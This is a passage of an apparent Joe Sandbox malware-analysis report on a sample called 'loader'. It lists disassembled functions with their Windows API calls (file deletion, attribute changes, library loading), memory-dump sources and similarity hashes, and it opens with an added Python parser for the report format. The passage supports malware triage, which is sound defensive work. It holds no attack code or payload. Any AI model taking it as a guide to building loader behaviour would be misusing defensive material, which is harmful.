              • Instruction ID: b0b186207ada9d0a3bea6b3e8f390b2964d4b19530a4ebc9dce8aba7864c8832
              • Opcode Fuzzy Hash: 25e2a879ad9b1da0c0d51049122f32017e500281086a7448c35e6ddf73713119
              • Instruction Fuzzy Hash: 49F0A03524020DBBEF015F60DC45FD9776CBF08382F488061BC88C61A1DBB28AE9AA50
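Every function entry in this listing follows one fixed plain-text layout: an APIs section of `Name.Module(args), ref: address` lines (with `Part of subcall function XXXX:` marking calls made by a callee), a Memory Dump Source section naming the dump and its image base, and a Similarity section carrying the API ID, Opcode ID, Instruction ID and fuzzy hashes. The parser below is an added example, not code from Joe Sandbox or from this report; it turns that layout into records so the call sites can be pivoted on (every function that calls SetFileAttributesW or CreateFileW, with the `ref:` addresses to jump to in the dump) and the Opcode ID and Instruction Fuzzy Hash values compared against reports for other samples. The sample input is constructed from two entries on this page; the record and field names (`FunctionBlock`, `ApiCall`, `similarity`, ...) are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two function entries copied from this listing, in the report's
# plain-text layout (one entry with a subcall and a parenthesis-free helper line).
SAMPLE = """\
APIs
• SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A458
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A489
Memory Dump Source
• Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 25e2a879ad9b1da0c0d51049122f32017e500281086a7448c35e6ddf73713119
• Instruction Fuzzy Hash: 49F0A03524020DBBEF015F60DC45FD9776CBF08382F488061BC88C61A1DBB28AE9AA50
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0011E20B
  • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
  • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: 3Ro
• Opcode ID: 2334ca094554957c8b5e237d02f8e3654ad05fd74bdfb2d5e6ebe12fe7ec2013
• Instruction Fuzzy Hash: E6B012A226E0037CB20C11447E16CB7031CC4C0B50330803AF605E4080E7514D874032
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.Module(args), ref: addr" or "Name.Module ref: addr", optionally prefixed by the
# "Part of subcall function XXXX:" marker the plugin prints for calls made inside a callee.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SOURCE_LINE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<base>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str             # KERNEL32 vs KERNELBASE: which export the call resolved to in the dump
    args: List[str]         # arguments as printed; "?" means the plugin could not recover the value
    ref: int                # address of the call site
    caller: Optional[int]   # set for subcall lines: the callee function that makes the call


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    image_base: Optional[int] = None
    similarity: Dict[str, str] = field(default_factory=dict)  # "API ID", "Opcode ID", "Instruction Fuzzy Hash", ...


def parse_api_line(item: str) -> Optional[ApiCall]:
    m = API_LINE.match(item)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    caller = int(m["caller"], 16) if m["caller"] else None
    return ApiCall(m["name"], m["module"], args, int(m["ref"], 16), caller)


def parse_report(text: str) -> List[FunctionBlock]:
    """One FunctionBlock per 'APIs' header; bullet lines are routed by the section they sit in."""
    blocks: List[FunctionBlock] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":          # every function entry opens with its APIs section
                blocks.append(FunctionBlock())
            section = line
            continue
        if not blocks or not line.startswith("•"):
            continue
        item = line.lstrip("•").strip()
        blk = blocks[-1]
        if section == "APIs":
            call = parse_api_line(item)
            if call:
                blk.apis.append(call)
        elif section == "Memory Dump Source":
            m = SOURCE_LINE.match(item)
            if m:
                blk.source_file, blk.image_base = m["file"], int(m["base"], 16)
        elif section == "Similarity":
            key, _, value = item.partition(":")
            blk.similarity[key.strip()] = value.strip()
    return blocks


def functions_calling(blocks: List[FunctionBlock], api_name: str) -> List[FunctionBlock]:
    """Entries that call api_name directly (subcall lines excluded): the functions to open in IDA first."""
    return [b for b in blocks if any(c.name == api_name and c.caller is None for c in b.apis)]


def api_modules(blocks: List[FunctionBlock]) -> List[tuple]:
    """Distinct (api, module) pairs, e.g. the same import seen via both KERNEL32 and KERNELBASE."""
    return sorted({(c.name, c.module) for b in blocks for c in b.apis})
```

Feed the whole function listing (as plain text) to `parse_report` and use `functions_calling` to collect the `ref:` addresses for the file-system APIs of interest; the `similarity["Opcode ID"]` and `similarity["Instruction Fuzzy Hash"]` values of each record are the keys to match against the same fields in another sample's report.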
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: 8cbcc4be155427720f4a7d80aeaa779919563ec27a066b70a7ac9e84a9b87b9e
              • Instruction ID: 3d395d1fa505c17d121e6ed5838f92170cd4a9d7fccd815afcb08ac30242298d
              • Opcode Fuzzy Hash: 8cbcc4be155427720f4a7d80aeaa779919563ec27a066b70a7ac9e84a9b87b9e
              • Instruction Fuzzy Hash: F2F0EC715043487ADB15BBF09C07FDD3B6DAB15745F040565B700534F2DB716AD04761
              APIs
              • DeleteFileW.KERNELBASE(?,?,?,0010984C,?,?,00109688,?,?,?,?,00131FA1,000000FF), ref: 0010A13E
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0010984C,?,?,00109688,?,?,?,?,00131FA1,000000FF), ref: 0010A16C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: e8fe16c82748423df5d3fd2825608b36ff272ebc8f6c774c6bc8ca2c7077b85f
              • Instruction ID: 01769edb18f28b50218e878686bc2cf569825155227eb3dd5b92172727f26b84
              • Opcode Fuzzy Hash: e8fe16c82748423df5d3fd2825608b36ff272ebc8f6c774c6bc8ca2c7077b85f
              • Instruction Fuzzy Hash: ECE092356402086BDB119F60DC81FE977ACBF08382F884065BCC8C30A0DBB29ED4AA94
              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,?,00131FA1,000000FF), ref: 0011A3D1
              • CoUninitialize.COMBASE(?,?,?,?,00131FA1,000000FF), ref: 0011A3D6
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: 41665e73079e29da22e596bbb6d1296a7d4aed7f7317276109cbc68d419486ba
              • Instruction ID: 8ef9e6611776dbbf04ac335daace19850f5fadf82951e895e8148fb1d71dfb22
              • Opcode Fuzzy Hash: 41665e73079e29da22e596bbb6d1296a7d4aed7f7317276109cbc68d419486ba
              • Instruction Fuzzy Hash: 58F06D32618A54EFC710EB4CDC05B5AFBACFB89B20F04436AF41983B60CB796840CA91
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,0010A189,?,001076B2,?,?,?,?), ref: 0010A1A5
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0010A189,?,001076B2,?,?,?,?), ref: 0010A1D1
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: a2d9ca61abee002c8c8ca2e1bb6460890fdcf075aabaf160718922d47c6987f0
              • Instruction ID: 01d83d16a8646f58cc9e0d536c60759ed5906b6c990f00eb0a60b521b58d9e18
              • Opcode Fuzzy Hash: a2d9ca61abee002c8c8ca2e1bb6460890fdcf075aabaf160718922d47c6987f0
              • Instruction Fuzzy Hash: EAE092355041289BDB20BB68DC05BD9B7ACEB1C3E1F0042A1FD94E36D0D7B19E889AE0
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001100A0
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0010EB86,Crypt32.dll,00000000,0010EC0A,?,?,0010EBEC,?,?,?), ref: 001100C2
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              • Opcode ID: fd012ed9a08fee64b45e0f3eb10dcdf7485390c03b18a2fb0b6cf5199969f6c7
              • Instruction ID: 908753d0ecf1e3a74a0c971829646e79586653d31cce94e51cf8d77f4bd5df67
              • Opcode Fuzzy Hash: fd012ed9a08fee64b45e0f3eb10dcdf7485390c03b18a2fb0b6cf5199969f6c7
              • Instruction Fuzzy Hash: 16E0127691111C6ADB219AA49C05FD677ACFF1D392F0400A5B948D3144DBB49AC4CBA4
              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00119B30
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00119B37
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              • Opcode ID: a6ae484bc1f737a76c132ba6f21eefe616f3ce84e2e280ec9089aa1be3bae3fb
              • Instruction ID: 24e0899111e55774106b0cd2b8aa68b2809dbaf0a77c0d860cb97d4380e43047
              • Opcode Fuzzy Hash: a6ae484bc1f737a76c132ba6f21eefe616f3ce84e2e280ec9089aa1be3bae3fb
              • Instruction Fuzzy Hash: 94E0ED71909218EBCB18DFD9D501AD9B7E8EB09721F10806BEC9593200E771AE44DB95
              APIs
                • Part of subcall function 0012329A: try_get_function.LIBVCRUNTIME ref: 001232AF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0012217A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00122185
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: 41ded1938555b6f5af9b0764280c8c3b35b9c7a5f517d77009b76d6d08085dfe
              • Instruction ID: 5538537b8d258bf79b428c31f5907dd109960e6a8d7f9622b204af6e60b31e40
              • Opcode Fuzzy Hash: 41ded1938555b6f5af9b0764280c8c3b35b9c7a5f517d77009b76d6d08085dfe
              • Instruction Fuzzy Hash: 8DD0226860433234BD0C27B03C43DAC2384A972BB03F00B46F330CA0E1EF7481706012
              APIs
              • DloadLock.DELAYIMP ref: 0011DC73
              • DloadProtectSection.DELAYIMP ref: 0011DC8F
                • Part of subcall function 0011DE67: DloadObtainSection.DELAYIMP ref: 0011DE77
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Dload$Section$LockObtainProtect
              • String ID:
              • API String ID: 731663317-0
              • Opcode ID: 82d2d89c5418783da2f32b05dac5012110b95d8a5efaf012cebc11bfb55cb75e
              • Instruction ID: 0e53684333dc8f219d9613c99d7be3b224f07d205deac9eaedc65442016e8e6c
              • Opcode Fuzzy Hash: 82d2d89c5418783da2f32b05dac5012110b95d8a5efaf012cebc11bfb55cb75e
              • Instruction Fuzzy Hash: 4CD012701402014AC71EEB64BD467DD3371B718744FA40AA5F105C78A0EFF45CD1C655
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              • Opcode ID: e9c112fc16b579ed1ba84facc5546a3129780755d9a1cecb9a20a4ba755a430a
              • Instruction ID: 75c8616a0360f35d99308983ace37bde0ee759e07ddf2fbf2f4cc494561227f1
              • Opcode Fuzzy Hash: e9c112fc16b579ed1ba84facc5546a3129780755d9a1cecb9a20a4ba755a430a
              • Instruction Fuzzy Hash: EEC0123205C620BFCB010BB0DC09D2FBBA8ABA6212F05C908F2A5C0060C238C090DB11
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 36633c316ae6cfcb13bb28c6bd9f17c2f55471e475cdd7109848ab01ba392faf
              • Instruction ID: abb86b94be9ac2c22d375b67ec4b8754b13bb86d82e58dfb70597c0ff19c8a75
              • Opcode Fuzzy Hash: 36633c316ae6cfcb13bb28c6bd9f17c2f55471e475cdd7109848ab01ba392faf
              • Instruction Fuzzy Hash: 64C1B430A04244AFEF15DF68C484BA97BE5EF1A314F0840B9EC85DB2C6CBB99944CB61
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 3784cd8f6e2a396cae60ee8a6937a9bea248ca05dc47203495366bf8ffa115f6
              • Instruction ID: 46a148efc01f0b1344e0758bee34e1064bcf7c4a20a0073972cb6f57b2b4bbe8
              • Opcode Fuzzy Hash: 3784cd8f6e2a396cae60ee8a6937a9bea248ca05dc47203495366bf8ffa115f6
              • Instruction Fuzzy Hash: 5A71D071104F44AEDB25DB70CC51AE7B7E8AF24301F44492EE5EB87182DBB16A48CF50
              APIs
              • __EH_prolog.LIBCMT ref: 00108384
                • Part of subcall function 00101380: __EH_prolog.LIBCMT ref: 00101385
                • Part of subcall function 00101380: new.LIBCMT ref: 001013FE
                • Part of subcall function 001019A6: __EH_prolog.LIBCMT ref: 001019AB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 596a8bc414b15251b6eff819abd23e4cb0827e696e8b8e9604b52410e8685691
              • Instruction ID: e415d60b87aea2ac30218cfeb469264d8421f0d1fe327644d007421c67585d6c
              • Opcode Fuzzy Hash: 596a8bc414b15251b6eff819abd23e4cb0827e696e8b8e9604b52410e8685691
              • Instruction Fuzzy Hash: 2D41A3319446589ADF24EB60CC55BEAB3A8AF64310F0440EAE5CAE70D3DFB55EC8DB50
              APIs
              • __EH_prolog.LIBCMT ref: 00101E05
                • Part of subcall function 00103B3D: __EH_prolog.LIBCMT ref: 00103B42
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 61e5dcac2bba4586580c8014d5cbc0d8e37faa9021583657b40bc6ef47125d10
              • Instruction ID: 6b033eba664d999f5f2d5ae0eff0701f5eff6fdb3b16e65221b580a206621889
              • Opcode Fuzzy Hash: 61e5dcac2bba4586580c8014d5cbc0d8e37faa9021583657b40bc6ef47125d10
              • Instruction Fuzzy Hash: DC212B72944109AFCB15EF99D9519EEFBF6BF68300B10006EE885A7291CB765E50CB60
              APIs
              • __EH_prolog.LIBCMT ref: 0011A7C8
                • Part of subcall function 00101380: __EH_prolog.LIBCMT ref: 00101385
                • Part of subcall function 00101380: new.LIBCMT ref: 001013FE
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 8fb57111203a1689d90a7afe279249895e5434752e8f24c850307fa7bdafdc75
              • Instruction ID: 92b3e84dced38eb3f6c55727d86f9c5ac87c251d1dfb137d735be74099dab91b
              • Opcode Fuzzy Hash: 8fb57111203a1689d90a7afe279249895e5434752e8f24c850307fa7bdafdc75
              • Instruction Fuzzy Hash: 97217F71C05249AECF19DF94C9519EEBBF4FF29300F4004AEE849A7242DB796E46CB61
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 64e8c6e301feb469cae468e946ae85de7b5e5b59fd91012b594c6dc2d954b217
              • Instruction ID: 1efc5eb416a52c2f7c78dd18e96d41d72568ba25fca29fb474e5ccc047b31abc
              • Opcode Fuzzy Hash: 64e8c6e301feb469cae468e946ae85de7b5e5b59fd91012b594c6dc2d954b217
              • Instruction Fuzzy Hash: 6A118673E0052897CB15ABA8CC519DDB735BF58750F044115F8447B2D2DB749D108AD0
              APIs
                • Part of subcall function 001285A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00128FD3,00000001,00000364,?,00123713,00000050,?,00140EE8,00000200), ref: 001285EA
              • _free.LIBCMT ref: 0012BBF6
              Memory Dump Source
